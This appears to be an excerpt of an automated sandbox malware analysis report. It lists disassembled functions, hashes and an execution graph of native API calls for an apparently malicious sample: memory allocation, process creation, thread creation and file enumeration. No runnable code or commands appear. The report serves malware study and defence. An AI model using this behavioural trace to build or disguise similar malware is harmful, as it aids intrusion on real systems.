                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: .$P$e$i$m$o$r$x
                                                                                                                                        • API String ID: 0-620024284
                                                                                                                                        • Opcode ID: 1d91aef5dff2661140efb40f7c3fd32e10e9c1af89628b93aea7ac5e835f784c
                                                                                                                                        • Instruction ID: 59bba7aceea3b92c85c613375816c70c4713d69c793831011c5d38b7d73e4078
                                                                                                                                        • Opcode Fuzzy Hash: 1d91aef5dff2661140efb40f7c3fd32e10e9c1af89628b93aea7ac5e835f784c
                                                                                                                                        • Instruction Fuzzy Hash: 444167B6C00214BAEB21DBA0DC50FDE777EEF54700F008599B549A7241EBB55B898FB1
                                                                                                                                        Function 02D97386 Relevance: 6.3, Strings: 5, Instructions: 23COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 92q$\$g-al$g-alre$re
                                                                                                                                        • API String ID: 0-1518786521
                                                                                                                                        • Opcode ID: 33449af82afbc51774a1d4bebbbea758dcf3b6e6180c029d309d392139d4530e
                                                                                                                                        • Instruction ID: 37d9e9b888690d41ede0d8e0c6fa7417b802b26946f0c3277b703ce8d4d2c502
                                                                                                                                        • Opcode Fuzzy Hash: 33449af82afbc51774a1d4bebbbea758dcf3b6e6180c029d309d392139d4530e
                                                                                                                                        • Instruction Fuzzy Hash: 40E092B1D1024CABDB04EFE8CD06BAEBB78EF05200F1049D9D8549B242E2708A04CB86
                                                                                                                                        Function 02DA9F46 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 5$8$9$e
                                                                                                                                        • API String ID: 0-2726392811
                                                                                                                                        • Opcode ID: 58c56dc894ab0c7d2f6ebd9510ca3a1306f9f62ac618956b8278adf3864205c7
                                                                                                                                        • Instruction ID: e9d930202d182cc73d12bcb3fb220b085deac91ce06acfdb33b46da056601242
                                                                                                                                        • Opcode Fuzzy Hash: 58c56dc894ab0c7d2f6ebd9510ca3a1306f9f62ac618956b8278adf3864205c7
                                                                                                                                        • Instruction Fuzzy Hash: 3E3152B1910109AFEB05DBA4CD51FEE77B9EF08304F004199F905A6340EBB6AE458BF5
                                                                                                                                        Function 02DAB356 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $e$k$o
                                                                                                                                        • API String ID: 0-3624523832
                                                                                                                                        • Opcode ID: c108b9637ea4d62419d48dbfe5d3f70675fcb9d30319d79b50b718de9ec2c588
                                                                                                                                        • Instruction ID: dd1bcdb7050a25f155282f656b1d62421466a762b2d4234ed3e46a6d9b26a44d
                                                                                                                                        • Opcode Fuzzy Hash: c108b9637ea4d62419d48dbfe5d3f70675fcb9d30319d79b50b718de9ec2c588
                                                                                                                                        • Instruction Fuzzy Hash: D50161B290021CEFDB14DF99DC84ADEB7B9FF08314F048659E91A9B201E7719945CBB0

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:2.6%
                                                                                                                                        Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                                        Signature Coverage:1.6%
                                                                                                                                        Total number of Nodes:443
                                                                                                                                        Total number of Limit Nodes:72
                                                                                                                                        execution_graph 98293 8ab6c0 98294 8cb670 NtAllocateVirtualMemory 98293->98294 98295 8acd31 98294->98295 98296 8bfa40 98297 8bfaa4 98296->98297 98325 8b64a0 98297->98325 98299 8bfbde 98300 8bfbd7 98300->98299 98332 8b65b0 98300->98332 98302 8bfd83 98303 8bfc5a 98303->98302 98304 8bfd92 98303->98304 98336 8bf820 98303->98336 98305 8c9660 NtClose 98304->98305 98308 8bfd9c 98305->98308 98307 8bfc96 98307->98304 98309 8bfca1 98307->98309 98310 8cb7d0 RtlAllocateHeap 98309->98310 98311 8bfcca 98310->98311 98312 8bfce9 98311->98312 98313 8bfcd3 98311->98313 98345 8bf710 CoInitialize 98312->98345 98314 8c9660 NtClose 98313->98314 98316 8bfcdd 98314->98316 98317 8bfcf7 98348 8c9160 98317->98348 98319 8bfd72 98320 8c9660 NtClose 98319->98320 98321 8bfd7c 98320->98321 98323 8cb6f0 RtlFreeHeap 98321->98323 98322 8bfd15 98322->98319 98324 8c9160 LdrInitializeThunk 98322->98324 98323->98302 98324->98322 98326 8b64d3 98325->98326 98327 8b64f4 98326->98327 98352 8c91f0 98326->98352 98327->98300 98329 8b6517 98329->98327 98330 8c9660 NtClose 98329->98330 98331 8b6597 98330->98331 98331->98300 98333 8b65d5 98332->98333 98357 8c9020 98333->98357 98337 8bf83c 98336->98337 98338 8b4730 LdrLoadDll 98337->98338 98340 8bf85a 98338->98340 98339 8bf863 98339->98307 98340->98339 98341 8b4730 LdrLoadDll 98340->98341 98342 8bf92e 98341->98342 98343 8b4730 LdrLoadDll 98342->98343 98344 8bf988 98342->98344 98343->98344 98344->98307 98347 8bf775 98345->98347 98346 8bf80b CoUninitialize 98346->98317 98347->98346 98349 8c917d 98348->98349 98362 30f2ba0 LdrInitializeThunk 98349->98362 98350 8c91aa 98350->98322 98353 8c920a 98352->98353 98356 30f2ca0 LdrInitializeThunk 98353->98356 98354 8c9233 98354->98329 98356->98354 98358 8c903a 98357->98358 98361 30f2c60 LdrInitializeThunk 98358->98361 98359 8b6649 98359->98303 98361->98359 98362->98350 98116 8c1980 98117 8c199c 98116->98117 98118 8c19d8 98117->98118 98119 8c19c4 98117->98119 98126 8c9660 98118->98126 98120 8c9660 NtClose 98119->98120 98122 8c19cd 98120->98122 98123 8c19e1 98129 8cb810 RtlAllocateHeap 98123->98129 98125 8c19ec 98127 8c967d 98126->98127 98128 8c968b NtClose 98127->98128 98128->98123 98129->98125 98368 8c95c0 98369 8c9634 98368->98369 98371 8c95e8 98368->98371 98370 8c9647 NtDeleteFile 98369->98370 98372 8c8cc0 98373 8c8cdd 98372->98373 98376 30f2df0 LdrInitializeThunk 98373->98376 98374 8c8d02 98376->98374 98377 8c8b40 98378 8c8bcf 98377->98378 98379 8c8b6b 98377->98379 98382 30f2ee0 LdrInitializeThunk 98378->98382 98380 8c8bfd 98382->98380 98383 8c0340 98384 8c035d 98383->98384 98385 8b4730 LdrLoadDll 98384->98385 98386 8c037b 98385->98386 98387 8b295f 98388 8b64a0 2 API calls 98387->98388 98389 8b297d 98388->98389 98130 8a9e10 98131 8a9e1f 98130->98131 98132 8a9e60 98131->98132 98133 8a9e4d CreateThread 98131->98133 98134 8b5d90 98139 8b82d0 98134->98139 98136 8b5dc0 98138 8b5dec 98136->98138 98143 8b8250 98136->98143 98140 8b82e3 98139->98140 98150 8c8c10 98140->98150 98142 8b830e 98142->98136 98144 8b8294 98143->98144 98145 8b82b5 98144->98145 98156 8c89e0 98144->98156 98145->98136 98147 8b82a5 98148 8b82c1 98147->98148 98149 8c9660 NtClose 98147->98149 98148->98136 98149->98145 98151 8c8c8b 98150->98151 98153 8c8c38 98150->98153 98155 30f2dd0 LdrInitializeThunk 98151->98155 98152 8c8cad 98152->98142 98153->98142 98155->98152 98157 8c8a0b 98156->98157 98158 8c8a5d 98156->98158 98157->98147 98161 30f4650 LdrInitializeThunk 98158->98161 98159 8c8a7f 98159->98147 98161->98159 98162 8b7310 98163 8b732c 98162->98163 98167 8b737f 98162->98167 98165 8c9660 NtClose 98163->98165 98163->98167 98164 8b74b1 98166 8b7347 98165->98166 98172 8b6730 NtClose LdrInitializeThunk LdrInitializeThunk 98166->98172 98167->98164 98173 8b6730 NtClose LdrInitializeThunk LdrInitializeThunk 98167->98173 98169 8b7491 98169->98164 98174 8b6900 NtClose LdrInitializeThunk LdrInitializeThunk 98169->98174 98172->98167 98173->98169 98174->98164 98390 8bc7d0 98391 8bc7f9 98390->98391 98392 8bc8fd 98391->98392 98393 8bc8a3 FindFirstFileW 98391->98393 98393->98392 98395 8bc8be 98393->98395 98394 8bc8e4 FindNextFileW 98394->98395 98396 8bc8f6 FindClose 98394->98396 98395->98394 98396->98392 98397 8c94d0 98398 8c94f8 98397->98398 98399 8c9574 98397->98399 98400 8c9587 NtReadFile 98399->98400 98401 30f2ad0 LdrInitializeThunk 98402 8b9def 98404 8b9dff 98402->98404 98403 8b9e06 98404->98403 98405 8b9e3d 98404->98405 98406 8cb6f0 RtlFreeHeap 98404->98406 98406->98405 98407 8b32e3 98412 8b7f50 98407->98412 98410 8c9660 NtClose 98411 8b330f 98410->98411 98413 8b32f3 98412->98413 98414 8b7f6a 98412->98414 98413->98410 98413->98411 98418 8c8db0 98414->98418 98417 8c9660 NtClose 98417->98413 98419 8c8dcd 98418->98419 98422 30f35c0 LdrInitializeThunk 98419->98422 98420 8b803a 98420->98417 98422->98420 98423 8b0f60 98424 8b0f71 98423->98424 98425 8b4730 LdrLoadDll 98424->98425 98426 8b0f98 98425->98426 98427 8b0fdd 98426->98427 98428 8b0fcc PostThreadMessageW 98426->98428 98428->98427 98175 8c62a0 98176 8c62fa 98175->98176 98178 8c6307 98176->98178 98179 8c3ca0 98176->98179 98186 8cb670 98179->98186 98181 8c3dee 98181->98178 98182 8c3ce1 98182->98181 98189 8b4730 98182->98189 98184 8c3d27 98184->98181 98185 8c3d70 Sleep 98184->98185 98185->98184 98193 8c97b0 98186->98193 98188 8cb69e 98188->98182 98190 8b4733 98189->98190 98191 8b4790 LdrLoadDll 98190->98191 98192 8b475b 98190->98192 98191->98192 98192->98184 98194 8c9845 98193->98194 98196 8c97db 98193->98196 98195 8c9858 NtAllocateVirtualMemory 98194->98195 98195->98188 98196->98188 98197 8c1d20 98202 8c1d39 98197->98202 98198 8c1dcc 98199 8c1d84 98205 8cb6f0 98199->98205 98202->98198 98202->98199 98203 8c1dc7 98202->98203 98204 8cb6f0 RtlFreeHeap 98203->98204 98204->98198 98208 8c99a0 98205->98208 98207 8c1d94 98209 8c99bd 98208->98209 98210 8c99cb RtlFreeHeap 98209->98210 98210->98207 98436 8a9e70 98438 8aa243 98436->98438 98437 8aa68c 98438->98437 98440 8cb360 98438->98440 98441 8cb386 98440->98441 98446 8a4050 98441->98446 98443 8cb392 98444 8cb3cb 98443->98444 98449 8c5830 98443->98449 98444->98437 98453 8b33e0 98446->98453 98448 8a405d 98448->98443 98450 8c5892 98449->98450 98452 8c589f 98450->98452 98471 8b1ba0 98450->98471 98452->98444 98454 8b33fa 98453->98454 98456 8b3410 98454->98456 98457 8ca090 98454->98457 98456->98448 98459 8ca0aa 98457->98459 98458 8ca0d9 98458->98456 98459->98458 98464 8c8d10 98459->98464 98462 8cb6f0 RtlFreeHeap 98463 8ca149 98462->98463 98463->98456 98465 8c8d2d 98464->98465 98468 30f2c0a 98465->98468 98466 8c8d56 98466->98462 98469 30f2c1f LdrInitializeThunk 98468->98469 98470 30f2c11 98468->98470 98469->98466 98470->98466 98472 8b1bdb 98471->98472 98487 8b8060 98472->98487 98474 8b1be3 98475 8b1ec6 98474->98475 98476 8cb7d0 RtlAllocateHeap 98474->98476 98475->98452 98477 8b1bf9 98476->98477 98478 8cb7d0 RtlAllocateHeap 98477->98478 98479 8b1c0a 98478->98479 98480 8cb7d0 RtlAllocateHeap 98479->98480 98482 8b1c1b 98480->98482 98485 8b1cb2 98482->98485 98502 8b6c00 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98482->98502 98483 8b4730 LdrLoadDll 98484 8b1e72 98483->98484 98498 8c8170 98484->98498 98485->98483 98488 8b808c 98487->98488 98489 8b7f50 2 API calls 98488->98489 98490 8b80af 98489->98490 98491 8b80b9 98490->98491 98492 8b80d1 98490->98492 98493 8c9660 NtClose 98491->98493 98495 8b80c4 98491->98495 98494 8b80ed 98492->98494 98496 8c9660 NtClose 98492->98496 98493->98495 98494->98474 98495->98474 98497 8b80e3 98496->98497 98497->98474 98499 8c81d2 98498->98499 98501 8c81df 98499->98501 98503 8b1ee0 98499->98503 98501->98475 98502->98485 98506 8b1f00 98503->98506 98519 8b8330 98503->98519 98505 8b2463 98505->98501 98506->98505 98523 8c1350 98506->98523 98509 8b2114 98531 8cc8c0 98509->98531 98510 8b1f5e 98510->98505 98526 8cc790 98510->98526 98512 8b82d0 LdrInitializeThunk 98515 8b217c 98512->98515 98513 8b2129 98513->98515 98537 8b09e0 98513->98537 98515->98505 98515->98512 98516 8b09e0 LdrInitializeThunk 98515->98516 98516->98515 98517 8b22d3 98517->98515 98518 8b82d0 LdrInitializeThunk 98517->98518 98518->98517 98520 8b833d 98519->98520 98521 8b835e SetErrorMode 98520->98521 98522 8b8365 98520->98522 98521->98522 98522->98506 98524 8cb670 NtAllocateVirtualMemory 98523->98524 98525 8c1371 98524->98525 98525->98510 98527 8cc7a6 98526->98527 98528 8cc7a0 98526->98528 98529 8cb7d0 RtlAllocateHeap 98527->98529 98528->98509 98530 8cc7cc 98529->98530 98530->98509 98532 8cc830 98531->98532 98533 8cc88d 98532->98533 98534 8cb7d0 RtlAllocateHeap 98532->98534 98533->98513 98535 8cc86a 98534->98535 98536 8cb6f0 RtlFreeHeap 98535->98536 98536->98533 98538 8b09f9 98537->98538 98541 8c98d0 98538->98541 98542 8c98ea 98541->98542 98545 30f2c70 LdrInitializeThunk 98542->98545 98543 8b09ff 98543->98517 98545->98543 98211 8baf30 98216 8bac40 98211->98216 98213 8baf3d 98230 8ba8b0 98213->98230 98215 8baf53 98217 8bac65 98216->98217 98241 8b8540 98217->98241 98220 8badb0 98220->98213 98222 8badc7 98222->98213 98223 8badbe 98223->98222 98225 8baeb5 98223->98225 98260 8ba300 98223->98260 98227 8baf1a 98225->98227 98269 8ba670 98225->98269 98228 8cb6f0 RtlFreeHeap 98227->98228 98229 8baf21 98228->98229 98229->98213 98231 8ba8c6 98230->98231 98234 8ba8d1 98230->98234 98232 8cb7d0 RtlAllocateHeap 98231->98232 98232->98234 98233 8ba8f5 98233->98215 98234->98233 98235 8b8540 GetFileAttributesW 98234->98235 98236 8bac12 98234->98236 98239 8ba300 RtlFreeHeap 98234->98239 98240 8ba670 RtlFreeHeap 98234->98240 98235->98234 98237 8bac2b 98236->98237 98238 8cb6f0 RtlFreeHeap 98236->98238 98237->98215 98238->98237 98239->98234 98240->98234 98242 8b8561 98241->98242 98243 8b8568 GetFileAttributesW 98242->98243 98244 8b8573 98242->98244 98243->98244 98244->98220 98245 8c3570 98244->98245 98246 8c357e 98245->98246 98247 8c3585 98245->98247 98246->98223 98248 8b4730 LdrLoadDll 98247->98248 98249 8c35ba 98248->98249 98250 8c35c9 98249->98250 98276 8c3030 LdrLoadDll 98249->98276 98256 8c3774 98250->98256 98273 8cb7d0 98250->98273 98253 8c35e2 98254 8c376a 98253->98254 98253->98256 98257 8c35fe 98253->98257 98255 8cb6f0 RtlFreeHeap 98254->98255 98254->98256 98255->98256 98256->98223 98257->98256 98258 8cb6f0 RtlFreeHeap 98257->98258 98259 8c375e 98258->98259 98259->98223 98261 8ba326 98260->98261 98280 8bdd40 98261->98280 98263 8ba398 98265 8ba520 98263->98265 98266 8ba3b6 98263->98266 98264 8ba505 98264->98223 98265->98264 98267 8ba1c0 RtlFreeHeap 98265->98267 98266->98264 98285 8ba1c0 98266->98285 98267->98265 98270 8ba696 98269->98270 98271 8bdd40 RtlFreeHeap 98270->98271 98272 8ba71d 98271->98272 98272->98225 98277 8c9960 98273->98277 98275 8cb7eb 98275->98253 98276->98250 98278 8c997a 98277->98278 98279 8c9988 RtlAllocateHeap 98278->98279 98279->98275 98282 8bdd64 98280->98282 98281 8bdd71 98281->98263 98282->98281 98283 8cb6f0 RtlFreeHeap 98282->98283 98284 8bddb4 98283->98284 98284->98263 98286 8ba1dd 98285->98286 98289 8bddd0 98286->98289 98288 8ba2e3 98288->98266 98290 8bddf4 98289->98290 98291 8bde9e 98290->98291 98292 8cb6f0 RtlFreeHeap 98290->98292 98291->98288 98292->98291 98546 8b74f0 98547 8b7508 98546->98547 98549 8b7562 98546->98549 98547->98549 98550 8bb450 98547->98550 98551 8bb476 98550->98551 98552 8bb6af 98551->98552 98577 8c9a30 98551->98577 98552->98549 98554 8bb4f2 98554->98552 98555 8cc8c0 2 API calls 98554->98555 98557 8bb511 98555->98557 98556 8bb5e8 98559 8b5d10 LdrInitializeThunk 98556->98559 98561 8bb607 98556->98561 98557->98552 98557->98556 98558 8c8d10 LdrInitializeThunk 98557->98558 98560 8bb573 98558->98560 98559->98561 98560->98556 98565 8bb57c 98560->98565 98564 8bb697 98561->98564 98583 8c8880 98561->98583 98562 8bb5d0 98563 8b82d0 LdrInitializeThunk 98562->98563 98568 8bb5de 98563->98568 98569 8b82d0 LdrInitializeThunk 98564->98569 98565->98552 98565->98562 98566 8bb5ae 98565->98566 98580 8b5d10 98565->98580 98598 8c49b0 LdrInitializeThunk 98566->98598 98568->98549 98572 8bb6a5 98569->98572 98572->98549 98573 8bb66e 98588 8c8930 98573->98588 98575 8bb688 98593 8c8a90 98575->98593 98578 8c9a4a 98577->98578 98579 8c9a5b CreateProcessInternalW 98578->98579 98579->98554 98599 8c8ee0 98580->98599 98582 8b5d4e 98582->98566 98584 8c88fa 98583->98584 98586 8c88a8 98583->98586 98605 30f39b0 LdrInitializeThunk 98584->98605 98585 8c891c 98585->98573 98586->98573 98589 8c89ad 98588->98589 98590 8c895b 98588->98590 98606 30f4340 LdrInitializeThunk 98589->98606 98590->98575 98591 8c89cf 98591->98575 98594 8c8b0d 98593->98594 98595 8c8abb 98593->98595 98607 30f2fb0 LdrInitializeThunk 98594->98607 98595->98564 98596 8c8b2f 98596->98564 98598->98562 98600 8c8f8e 98599->98600 98602 8c8f0c 98599->98602 98604 30f2d10 LdrInitializeThunk 98600->98604 98601 8c8fd0 98601->98582 98602->98582 98604->98601 98605->98585 98606->98591 98607->98596 98608 8b6f70 98609 8b6f9a 98608->98609 98612 8b8100 98609->98612 98611 8b6fc1 98613 8b811d 98612->98613 98619 8c8e00 98613->98619 98615 8b816d 98616 8b8174 98615->98616 98617 8c8ee0 LdrInitializeThunk 98615->98617 98616->98611 98618 8b819d 98617->98618 98618->98611 98620 8c8e98 98619->98620 98621 8c8e28 98619->98621 98624 30f2f30 LdrInitializeThunk 98620->98624 98621->98615 98622 8c8ece 98622->98615 98624->98622 98630 8cc7f0 98631 8cb6f0 RtlFreeHeap 98630->98631 98632 8cc805 98631->98632 98633 8cb3f0 98634 8cb3fb 98633->98634 98635 8cb41a 98634->98635 98637 8c5d20 98634->98637 98638 8c5d82 98637->98638 98640 8c5d8f 98638->98640 98641 8b24e0 98638->98641 98640->98635 98642 8b2495 98641->98642 98647 8b24ef 98641->98647 98643 8b24b6 98642->98643 98644 8c8d10 LdrInitializeThunk 98642->98644 98648 8c96f0 98643->98648 98644->98643 98646 8b24cb 98646->98640 98649 8c977c 98648->98649 98651 8c9718 98648->98651 98653 30f2e80 LdrInitializeThunk 98649->98653 98650 8c97aa 98650->98646 98651->98646 98653->98650 98654 8c9370 98655 8c9424 98654->98655 98657 8c939c 98654->98657 98656 8c9437 NtCreateFile 98655->98656 98659 8b89f4 98661 8b8a04 98659->98661 98660 8b89b4 98661->98660 98663 8b7290 98661->98663 98664 8b72a6 98663->98664 98666 8b72df 98663->98666 98664->98666 98667 8b7100 LdrLoadDll 98664->98667 98666->98660 98667->98666

                                                                                                                                        Executed Functions

                                                                                                                                        Function 008A9E70 Relevance: 30.4, Strings: 24, Instructions: 374COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 27 8a9e70-8aa239 28 8aa243-8aa24a 27->28 29 8aa24c-8aa270 28->29 30 8aa297-8aa2b2 28->30 32 8aa272-8aa27b 29->32 33 8aa281-8aa295 29->33 31 8aa2c3-8aa2cf 30->31 34 8aa2ed 31->34 35 8aa2d1-8aa2dd 31->35 32->33 33->28 38 8aa2f4-8aa2fb 34->38 36 8aa2eb 35->36 37 8aa2df-8aa2e5 35->37 36->31 37->36 40 8aa2fd-8aa320 38->40 41 8aa322-8aa32b 38->41 40->38 42 8aa5ec-8aa5f3 41->42 43 8aa331-8aa347 41->43 44 8aa5f9-8aa612 42->44 45 8aa68c-8aa696 42->45 46 8aa358-8aa364 43->46 44->44 50 8aa614-8aa61e 44->50 49 8aa6a7-8aa6b3 45->49 47 8aa382-8aa394 46->47 48 8aa366-8aa372 46->48 53 8aa39a-8aa3b5 47->53 54 8aa470-8aa47a 47->54 51 8aa380 48->51 52 8aa374-8aa37a 48->52 55 8aa6c6-8aa6d0 49->55 56 8aa6b5-8aa6c4 49->56 57 8aa62f-8aa63b 50->57 51->46 52->51 53->53 61 8aa3b7-8aa3c1 53->61 62 8aa48b-8aa497 54->62 56->49 58 8aa64e-8aa655 57->58 59 8aa63d-8aa64c 57->59 65 8aa687 call 8cb360 58->65 66 8aa657-8aa685 58->66 59->57 69 8aa3d2-8aa3de 61->69 67 8aa499-8aa4ab 62->67 68 8aa4ad-8aa4b7 62->68 65->45 66->58 67->62 71 8aa4eb-8aa4f2 68->71 72 8aa4b9-8aa4d8 68->72 74 8aa3e0-8aa3f2 69->74 75 8aa3f4-8aa3fe 69->75 80 8aa529-8aa533 71->80 81 8aa4f4-8aa527 71->81 77 8aa4da-8aa4e3 72->77 78 8aa4e9 72->78 74->69 79 8aa40f-8aa41b 75->79 77->78 78->68 82 8aa42c-8aa436 79->82 83 8aa41d-8aa42a 79->83 84 8aa544-8aa550 80->84 81->71 88 8aa447-8aa453 82->88 83->79 85 8aa552-8aa561 84->85 86 8aa563-8aa577 84->86 85->84 91 8aa588-8aa594 86->91 89 8aa46b 88->89 90 8aa455-8aa45e 88->90 89->42 93 8aa469 90->93 94 8aa460-8aa466 90->94 95 8aa5b6-8aa5c2 91->95 96 8aa596-8aa5a3 91->96 93->88 94->93 100 8aa5e7 95->100 101 8aa5c4-8aa5e5 95->101 98 8aa5b4 96->98 99 8aa5a5-8aa5ae 96->99 98->91 99->98 100->41 101->95
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: "\w$$=$(o$+$+$2$:$?H$D$DZ$T+$[$\$`$fq$g-$h$m$os$p9$v$w$|d$~v
                                                                                                                                        • API String ID: 0-1545153448
                                                                                                                                        • Opcode ID: 6edf661df15c18095d73e56fb02f93608c7cf10654a0cee5661c89b06a609b18
                                                                                                                                        • Instruction ID: df3f0c5278a37253d446b4d5ceff41b849932a417e22e94b9f8b3473ccdf6976
                                                                                                                                        • Opcode Fuzzy Hash: 6edf661df15c18095d73e56fb02f93608c7cf10654a0cee5661c89b06a609b18
                                                                                                                                        • Instruction Fuzzy Hash: A42290B0D05229CBEB28CF44C994BEDBBB1FB45308F1081D9D50DABA80D7B95A89DF45
                                                                                                                                        Function 008BC7D0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 008BC8B4
                                                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 008BC8EF
                                                                                                                                        • FindClose.KERNELBASE(?), ref: 008BC8FA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3541575487-0
                                                                                                                                        • Opcode ID: a9d401fa845b0ad9cfe64d9aba2512f5c7112ee372ec6229587db5e31742dadc
                                                                                                                                        • Instruction ID: 417821eed31af8ec411645ad65a7e3a653fab7ec314902d731a5eb20c708eebc
                                                                                                                                        • Opcode Fuzzy Hash: a9d401fa845b0ad9cfe64d9aba2512f5c7112ee372ec6229587db5e31742dadc
                                                                                                                                        • Instruction Fuzzy Hash: EC315271A00348ABDB20EFA4CC85FEF77BDEB45744F144459B909E6281DA74AA848BA1
                                                                                                                                        Function 008C9370 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtCreateFile.NTDLL(?,?,5F042D88,?,?,?,?,?,?,?,?), ref: 008C9468
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: a7dc78b719dc9cd15489baa3544b91b2f452c5f1a3848a5b9fd1987b19d3d2d3
                                                                                                                                        • Instruction ID: 187c09b4553ea180b5232f2b1237e3e4f7c794c0f3632c17a44c31d848b9e160
                                                                                                                                        • Opcode Fuzzy Hash: a7dc78b719dc9cd15489baa3544b91b2f452c5f1a3848a5b9fd1987b19d3d2d3
                                                                                                                                        • Instruction Fuzzy Hash: 5331C2B5A01648ABDB14DF98D881EEEB7B9FF8C700F108219F918A7340D730A841CBA5
                                                                                                                                        Function 008C94D0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtReadFile.NTDLL(?,?,5F042D88,?,?,?,?,?,?), ref: 008C95B0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                        • Opcode ID: 26da7fe65017b460ee3fec090c47ccdfb39ba2e08ec8d5d6aab7a917e6f74ca3
                                                                                                                                        • Instruction ID: c408079c6ccbd59264d2f5a088ca11c2506d3ffd137b0747a126713cb60e91ac
                                                                                                                                        • Opcode Fuzzy Hash: 26da7fe65017b460ee3fec090c47ccdfb39ba2e08ec8d5d6aab7a917e6f74ca3
                                                                                                                                        • Instruction Fuzzy Hash: D131E3B5A00648AFDB14DF98C881EEFB7B9EF89710F108219F918A7341D730A951CFA5
                                                                                                                                        Function 008C97B0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(008B1F5E,?,5F042D88,00000000,00000004,00003000,?,?,?,?,?,008C81DF,008B1F5E), ref: 008C9875
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                        • Opcode ID: 087a93d75a4b84e32af9cf21d5fb0da0d0c3dfed15466f40219d2a17887fc0ff
                                                                                                                                        • Instruction ID: c13bfdfdf6afcaa330ea7c7e3cca3981779b781e41f25b7b6707de632b35cc08
